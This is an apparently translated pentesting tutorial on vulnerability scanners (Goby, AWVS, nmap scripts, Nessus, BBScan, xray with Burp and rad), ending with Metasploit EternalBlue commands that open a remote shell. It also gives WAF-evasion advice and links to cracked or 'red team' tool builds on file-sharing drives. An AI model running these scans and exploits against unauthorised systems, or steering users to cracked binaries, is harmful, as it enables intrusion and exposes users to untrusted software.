Probing (automatically scanning websites for vulnerabilities and exploits)

Vulnerability Scan


1. Goby + AWVS vulnerability scanning

Introduction to goby and AWVS

Goby is the most comprehensive tool for mapping a target enterprise's assets. Goby clearly lists the open ports of an IP address and the services running on them, and it also runs practical checks against those open ports and applications. Setting aside the many low- and medium-risk findings, what I care about most are the vulnerabilities that can directly yield a shell.
AWVS is a lightweight web vulnerability scanner: given a target address, it quickly enumerates all of its vulnerabilities, graded as high, medium, low and information leakage.

Preparation

Download goby and awvs
(The red team special edition is recommended; it is more powerful.)
Download the awvs plug-in in goby
Add the awvs API to goby
Download npcap

Red team special edition goby download link: https://pan.baidu.com/s/1hkUDJzz8iT_WAngV1K-pXw?pwd=8hgd
Extraction code: 8hgd

Enter IP or domain name in goby to start scanning

Generally, subdomains are brute-forced directly and all of them are added as targets.

After scanning, click [Web Detection] on the right


View the vulnerabilities found by goby directly on the left side

In fact, this is usually enough.

Click the awvs button


The awvs page shows that it is scanning

goby page generation template


AWVS WAF bypass

The WAF can be bypassed by changing the scanning speed and the User-Agent header.
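The bypass above works because the WAF keys on the User-Agent string and on request rate. As an added example from the defending side (not code from the original post), here is a Python detector that ignores the User-Agent entirely and flags a client by behaviour instead: many distinct paths and a high 404 ratio within a time window. The log lines are constructed samples in Apache combined format.

```python
# Added example (not from the original post): behaviour-based scanner detection that does not
# depend on the User-Agent header, so changing that header does not evade it. A client is
# flagged when, inside one window, it requests many distinct paths and most of them 404.
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip it
    ip, ts, path, status, ua = m.groups()
    return ip, datetime.strptime(ts, TS_FMT), path, int(status), ua

def flag_scanners(lines, window_s=300, min_paths=8, min_404_ratio=0.5):
    """Return {ip: reason} for clients whose request mix looks like a scanner."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            per_ip[rec[0]].append(rec)
    flagged = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r[1])
        for i, first in enumerate(recs):  # slide a window starting at each request
            win = [r for r in recs[i:] if (r[1] - first[1]).total_seconds() <= window_s]
            paths = {r[2] for r in win}
            nf = sum(1 for r in win if r[3] == 404)
            if len(paths) >= min_paths and nf / len(win) >= min_404_ratio:
                flagged[ip] = f"{len(paths)} distinct paths, {nf}/{len(win)} 404s in {window_s}s"
                break
    return flagged

def _line(ip, sec, path, status, ua="Mozilla/5.0 (Windows NT 10.0) Firefox/120.0"):
    return f'{ip} - - [10/Jan/2024:12:{sec // 60:02d}:{sec % 60:02d} +0000] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'

# Constructed sample: a slow scan (one request every 30 s) with a browser User-Agent, and a normal visitor.
SAMPLE_LOG = [_line("10.0.0.5", 30 * n, f"/probe{n}.php", 404 if n % 5 else 200) for n in range(10)]
SAMPLE_LOG += [_line("10.0.0.9", 60 * n, p, 200) for n, p in enumerate(["/", "/login", "/about"])]

if __name__ == "__main__":
    for ip, why in flag_scanners(SAMPLE_LOG).items():
        print(f"{ip}: {why}")
```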

2. nmap

nmap needs to be updated frequently:
windows: https://nmap.org/download.html#windows

kali: execute the command sudo apt-get install nmap

Download vulscan

windows:
Visit https://github.com/scipag/vulscan, download it and put it into Nmap\scripts\vulscan
linux:
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s "$(pwd)/scipag_vulscan" /usr/share/nmap/scripts/vulscan
You can also download it on Windows and transfer it to /usr/share/nmap/scripts/ on Kali.

Update the vulnerability database:
Download the following files and put them in the vulscan/ folder:

https://www.computec.ch/projekte/vulscan/download/cve.csv
https://www.computec.ch/projekte/vulscan/download/exploitdb.csv
https://www.computec.ch/projekte/vulscan/download/openvas.csv
https://www.computec.ch/projekte/vulscan/download/osvdb.csv
https://www.computec.ch/projekte/vulscan/download/scipvuldb.csv
https://www.computec.ch/projekte/vulscan/download/securityfocus.csv
https://www.computec.ch/projekte/vulscan/download/securitytracker.csv
https://www.computec.ch/projekte/vulscan/download/xforce.csv

Download nmap-vulners

windows:
Visit https://github.com/vulnersCom/nmap-vulners, download it and put it into nmap\scripts\nmap-vulners

linux:
cd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git
You can also download it on Windows and transfer it to /usr/share/nmap/scripts/ on Kali.

Running and usage

Scan with vulscan (recommended): nmap -sV --script=vulscan/vulscan.nse 192.168.242.137
(It seems that more results show up on Windows.)
Scan with nmap-vulners: nmap -sV --script=nmap-vulners/vulners.nse 192.168.242.137
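Both scans produce a lot of per-port text. As an added example (not code from the original post or from the vulscan project), here is a small Python triage script that reads the XML nmap writes when -oX is added to a run like the vulscan one above and lists each host's open services with the number of references the script reported. The XML, including the vulscan output text inside it, is a constructed sample.

```python
# Added example (not from the original post): triage the XML nmap writes with -oX for a run
# like "nmap -sV --script=vulscan/vulscan.nse <host> -oX scan.xml": list each host's open
# services and how many references the script reported. SAMPLE_XML is a constructed sample.
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.242.137" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.2p2"/>
        <script id="vulscan" output="VulDB - https://vuldb.com:&#10;[12345] Sample entry one&#10;[12346] Sample entry two&#10;"/>
      </port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="8080"><state state="closed"/>
        <service name="http-proxy"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

def count_refs(output):
    # vulscan prints one reference per line, each prefixed with a bracketed id: "[12345] title"
    return sum(1 for line in output.splitlines() if line.startswith("["))

def inventory(xml_text):
    """Return {host: [(port, service, version, ref_count), ...]} for open ports, most refs first."""
    result = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        entries = []
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # closed/filtered ports carry no service worth triaging
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            version = " ".join(v for v in (attrs.get("product"), attrs.get("version")) if v)
            refs = sum(count_refs(s.get("output", "")) for s in port.findall("script"))
            entries.append((int(port.get("portid")), attrs.get("name", "?"), version, refs))
        result[addr] = sorted(entries, key=lambda e: -e[3])
    return result

if __name__ == "__main__":
    for host, services in inventory(SAMPLE_XML).items():
        for port, name, version, refs in services:
            print(f"{host}:{port:<5} {name:<14} {version:<16} refs={refs}")
```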

3. Nessus

Download reference links:
windows: https://www.cnblogs.com/wuchangsoft/p/17055111.html (after searching for nearly four days, I feel this is the best one)
Linux, plus complete usage instructions: https://blog.csdn.net/wwl012345/article/details/96998187
And: https://blog.csdn.net/Innocence_0/article/details/131654450
It mainly comes down to the following three steps.

A problem I ran into: the browser page cannot be opened.
Solution: switch the keyboard to English input, click the refresh button on the page, then click anywhere on the current page with the mouse and type thisisunsafe directly on the keyboard (not in the address bar; just type it with the page focused).

Usage:

New Scan

Basic Network Scan

Basic Network Scan is a simple scan, and it is usually enough.
Advanced Scan lets you configure the scan without any recommended defaults.

Configure basic information settings


Configure account password

If the website requires an account and password, configure them under Credentials.

Select plug-ins


Save

Click the ">" button to launch the scan

4. BBScan

First download BBScan2 from GitHub
Install the dependencies: pip install -r requirements.txt
Scan a single target: python BBScan.py --host [url]
Import targets from a file: python BBScan.py -f urls.txt
Parameters:

Targets:

  --host [HOST [HOST ...]]
                        Scan several hosts from command line
  -f TargetFile Load new line delimited targets from TargetFile
  -d TargetDirectory Load all *.txt files from TargetDirectory
  --crawler CrawlDirectory
                        Load all *.log crawl files from CrawlDirectory
  --network MASK Scan all Target/MASK neighbor hosts,
                        should be an integer between 8 and 31

HTTP SCAN:

  --rule [RuleFileName [RuleFileName ...]]
                        Import specified rule files only.
  -n, --no-crawl No crawling, sub folders will not be processed
  -nn, --no-check404 No HTTP 404 existence check
  --full Process all sub directories

Scripts SCAN:

  --scripts-only Scan with user scripts only
  --script [ScriptName [ScriptName ...]]
                        Execute specified scripts only
  --no-scripts Disable all scripts

CONCURRENT:

  -p PROCESS Num of processes running concurrently, 30 by default
  -t THREADS Num of scan threads for each scan process, 3 by default

OTHER:

  --proxy Proxy Set HTTP proxy server
  --timeout Timeout Max scan minutes for each target, 10 by default
  -md Save scan report as markdown format
  --save-ports PortsDataFile
                        Save open ports to PortsDataFile
  --debug Show verbose debug info
  -nnn, --no-browser Do not open web browser to view report
  -v show program's version number and exit

5. xray

Tool download address

All tools: https://pan.quark.cn/s/c54897469b01 (not on the speed-limited Baidu cloud disk)
You can also search for them yourself. (It seems that the cracking tool only works with xray 1.3.3.)

Usage

After downloading, double-click xray_windows_amd64.exe, then run .\xray_windows_amd64.exe genca in PowerShell to generate the certificate
Import the certificate into Firefox and configure the proxy as 127.0.0.1:7777

On Windows, run cmd as administrator, or use PowerShell.

Commonly used:
Passive scanning using HTTP proxy:
xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output ming.html

Other:
Use basic crawler vulnerability scanning:
xray_windows_amd64.exe webscan --basic-crawler http://example.com --html-output xxx.html
Quickly test a single url, no crawlers:
xray_windows_amd64.exe webscan --url http://example.com/?a=b --html-output single-url.html

Where:
If no module is specified, xray scans with all modules by default.
--html-output: write the report in HTML format
ming.html: the output report page

You can also use the graphical front end directly: super-xray-1.7-system-jre

Chaining with Burp

Burp configuration:
On top of the usual packet capture, configure a downstream proxy in Burp (its upstream proxy setting) so that the captured traffic is sent on to xray for scanning.
Here Burp captures the traffic and sends it to port 7777 on the local machine.

Important!

You must uncheck 'Set "Connection close" on incoming requests when using HTTP/1' in Burp, otherwise Burp automatically modifies the Connection header of the forwarded requests.

Then turn on xray

Chaining with rad

rad download address: https://github.com/chaitin/rad/releases
(It is also available in the network disk above.)
rad is a directory crawling tool, also developed by Chaitin Tech (Changting Technology). Because xray's own automated crawler is not very good, it can be combined with rad for more efficient automatic crawling. Note that rad only crawls the target's directories, not its subdomains!
(1) Monitoring a single domain name:
First start xray's proxy listener:
xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output proxy.html
Then let rad crawl the target:
rad_windows_amd64.exe -t http://example.com -http-proxy 127.0.0.1:7777
In this way, the results of rad's crawl are automatically forwarded to xray for scanning.
(2) Use a script to monitor multiple domain names:
Usage: python 1.py -r a.txt -o b.txt (-r is the domain list, -o is the output file)

import argparse
import time

parser = argparse.ArgumentParser()
txtName = str(int(time.time())) + ".txt"
parser.add_argument('-r', required=True, help='Input file: one domain name per line')
parser.add_argument('-o', type=str, default=txtName, help='Name of the output file. Default is ' + txtName)
args = parser.parse_args()

with open(args.r, 'r') as f:
    data = f.readlines()

# Build one PowerShell command line that runs rad against each target in turn.
# Note the escaped backslash: in a normal Python string "\r" is a carriage return.
cmds = []
for i in data:
    target = i.strip()
    if target:
        cmds.append(".\\rad_windows_amd64.exe -t {} --json abs.json --index".format(target))

with open(args.o, "w") as f:
    f.write("; ".join(cmds))

In the same way, xray, rad and Burp can even all be chained together, but I won't try that here.

Exploitation

MSF (Metasploit Framework)

MSF is the vulnerability exploitation and attack framework that ships with Kali. It contains three main components:

msfconsole: the most commonly used console for running exploit modules
msfweb: the graphical interface of MSF
msfupdate: updates MSF; it is recommended to update before use

(Using Eternal Blue as an example):
Run: msfconsole
Search for the vulnerability: search ms17-010
Select the exploit: use exploit/windows/smb/ms17_010_eternalblue
View the required options: show options
Set the target host: set RHOSTS 192.168.242.137
Start the attack: run
Reverse shell: shell

Search directly in a browser

For example, CVE-2008-4250

Check vulnerability disclosure platforms

https://www.cnvd.org.cn/
https://www.seebug.org/
https://fr.0day.today/
https://www.exploit-db.com/
https://packetstormsecurity.com/

etc.